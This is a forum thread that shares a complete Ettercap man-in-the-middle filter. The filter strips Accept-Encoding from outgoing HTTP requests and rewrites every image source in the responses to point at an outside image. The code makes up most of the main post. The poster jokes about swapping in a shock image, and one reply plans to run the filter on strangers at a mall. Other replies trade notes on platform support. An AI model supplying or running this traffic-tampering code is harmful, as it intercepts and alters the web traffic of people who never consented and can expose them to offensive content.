Irongeek

Ettercap Image Replacemnt Filters

5 posts in this topic

Way back when I wrote a web site image replacement filter for use with Ettercap.

[url="http://www.irongeek.com/i.php?page=security/ettercapfilter"]http://www.irongeek.com/i.php?page=security/ettercapfilter[/url]

It was very hit or miss with it's image replacement. Jon.dmml emailed me and showed me a better way. The page above has been updated, but just in case here is the code:

[codebox]

############################################################################
# #
# Jolly Pwned -- ig.filter -- filter source file #
# #
# By Irongeek. based on code from ALoR & NaGA #
# Along with some help from Kev and jon.dmml #
# [url="http://ettercap.sourceforge.net/forum/viewtopic.php?t=2833"]http://ettercap.sourceforge.net/forum/viewtopic.php?t=2833[/url] #
# #
# This program is free software; you can redistribute it and/or modify #
# it under the terms of the GNU General Public License as published by #
# the Free Software Foundation; either version 2 of the License, or #
# (at your option) any later version. #
# #
############################################################################
if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Rubbish!"); # note: replacement string is same length as original string
msg("zapped Accept-Encoding!\n");
}
}
if (ip.proto == TCP && tcp.src == 80) {
replace("src=", "src=\"http://www.irongeek.com/images/jollypwn.png\" ");
replace("SRC=", "src=\"http://www.irongeek.com/images/jollypwn.png\" ");
replace("src =", "src=\"http://www.irongeek.com/images/jollypwn.png\" ");
replace("SRC =", "src=\"http://www.irongeek.com/images/jollypwn.png\" ");
msg("Filter Ran.\n");
}
[/codebox]

Tubgirl anyone?

Share this post


Link to post
Share on other sites
Gonna have to give this a try on my next hacking trip to the mall. Although I think changing the GET request would be a little more fun.

Share this post


Link to post
Share on other sites
Nice, gonna have to try this one. The last one didn't work too well with me.

Share this post


Link to post
Share on other sites
Wow does ettercap filtering ever suck under Windows, I'll try this in nix later when I get a chance. ;)

Share this post


Link to post
Share on other sites
[quote name='jabzor' post='243589' date='Mar 19 2007, 06:32 AM']Wow does ettercap filtering ever suck under Windows, I'll try this in nix later when I get a chance. ;)[/quote]


Yeah, I tested under Linux and it worked fine, but the Windows port just crashed on me.

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!


Register a new account

Sign in

Already have an account? Sign in here.


Sign In Now